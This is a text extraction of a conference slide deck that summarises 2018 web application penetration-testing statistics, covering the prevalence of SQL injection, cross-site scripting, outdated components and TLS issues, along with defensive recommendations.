Download presentation
Presentation is loading. Please wait.
Published byประมนต์ พันธุเมธา Modified over 5 years ago
1
A snapshot into current Web Application vulnerabilities
2
Willem Mouton willemm@senseofsecurity.com.au @w_m__
Introduction Willem
3
Why we like numbers (and WebApps)
Unpacking the numbers Digging a bit deeper Dealing with the root cause Closing thoughts Q&A
4
Why we like numbers (and WebApps)
Improves our internal processes and quality Provides (somewhat of) a measurement against industry Helps answer some of your most burning questions
5
Unpacking the numbers
6
Unpacking the numbers Data collected from 175 reports reviewed*
3670 findings analysed** Average of 21 findings per report Roughly 40% of our projects
7
Unpacking the numbers Sense of Security Risk Matrix
8
Unpacking the numbers Top 10 issues identified in 2018
(irrespective of risk level)
9
Unpacking the numbers Top 10 issues identified in 2018
(irrespective of risk level) We’ll get back to these
10
Unpacking the numbers SOS Top 10 categories vs OWASP Top 10
(and why they differ on paper)
11
Unpacking the numbers Large vs Small (on average across all reports)
12
Unpacking the numbers Private sector vs Government
(on average across all reports)
13
Digging deeper
14
Digging deeper Data validation remains a massive problem SQL Injection
11% of all applications test had at least one instance 20 year old technique Fully industrialised attacks Widely used in breaches Noisy but low detection rate
15
Digging deeper Data validation remains a massive problem SQL Injection
11% of all applications test had at least one instance 20 year old technique Fully industrialised attacks Widely used in breaches Noisy but low detection rate
16
Digging deeper Data validation remains a massive problem SQL Injection
11% of all applications test had at least one instance 20 year old technique Fully industrialised attacks Widely used in breaches Noisy but low detection rate
17
Digging deeper Data validation remains a massive problem SQL Injection
11% of all applications test had at least one instance 20 year old technique Fully industrialised attacks Widely used in breaches Noisy but low detection rate
18
Digging deeper Data validation remains a massive problem SQL Injection
11% of all applications test had at least one instance 20 year old technique Fully industrialised attacks Widely used in breaches Noisy but low detection rate
19
Digging deeper Data validation remains a massive problem
Cross-Site Scripting 31% of all applications tested had at least one instance More complicated, but can be more damaging
20
Digging deeper Data validation remains a massive problem
Cross-Site Scripting 31% of all applications tested had at least one or more instances More complicated, but can be more damaging
21
Digging deeper The forgotten software stack
Components with known vulnerabilities 31% of all applications tested had outdated components Mostly ignored Hosting of 3rd party CDN providers Poor internal management of code dependencies
22
Digging deeper The forgotten software stack
Components with known vulnerabilities 31% of all applications tested had outdated components Mostly ignored Hosting of 3rd party CDN providers Poor internal management of code dependencies
23
Digging deeper The forgotten software stack
Components with known vulnerabilities 31% of all applications tested had outdated components Mostly ignored Hosting of 3rd party CDN providers Poor internal management of code dependencies
24
Digging deeper 88% of all applications tested had SSL/TLS issues
Certificate issues Protocol issues Cipher / Configuration issues Known attacks Standardisation lacking
25
Digging deeper Some honourable mentions
XML external entity vulnerabilities Serialization issues Server-side request forgery (SSRF)
26
Root cause Configuration Design Implementation
27
Root cause Configuration Design Implementation
28
A quick Segway Consider the eco system your web application live in
Most common attack actively being used Credential stuffing Known breaches (Don’t be (in)one of them) #ShamelessPromotions Our Whitepaper on External Network Pentesting
29
A quick Segway Consider the eco system your web application live in
Most common attack actively being used Credential stuffing Known breaches (Don’t be (in)one of them) #ShamelessPromotions Our Whitepaper on External Network Pentesting
30
Closing thoughts
31
Closing thoughts Changing the next years report
Security from design to …. to BAU Consider all vulnerabilities Create development / deployment standards for your organisation Automation is key, but don’t forget the manual work Use industry guidelines, OWASP ASVS is great Training
32
Closing thoughts Changing the next years report
Security from design to …. to BAU Consider all vulnerabilities Create development / deployment standards for your organisation Automation is key, but don’t forget the manual work Use industry guidelines, OWASP ASVS is great Training
33
Questions?
34
A snapshot into current Web Application vulnerabilities
Similar presentations
© 2024 SlidePlayer.com. Inc.
All rights reserved.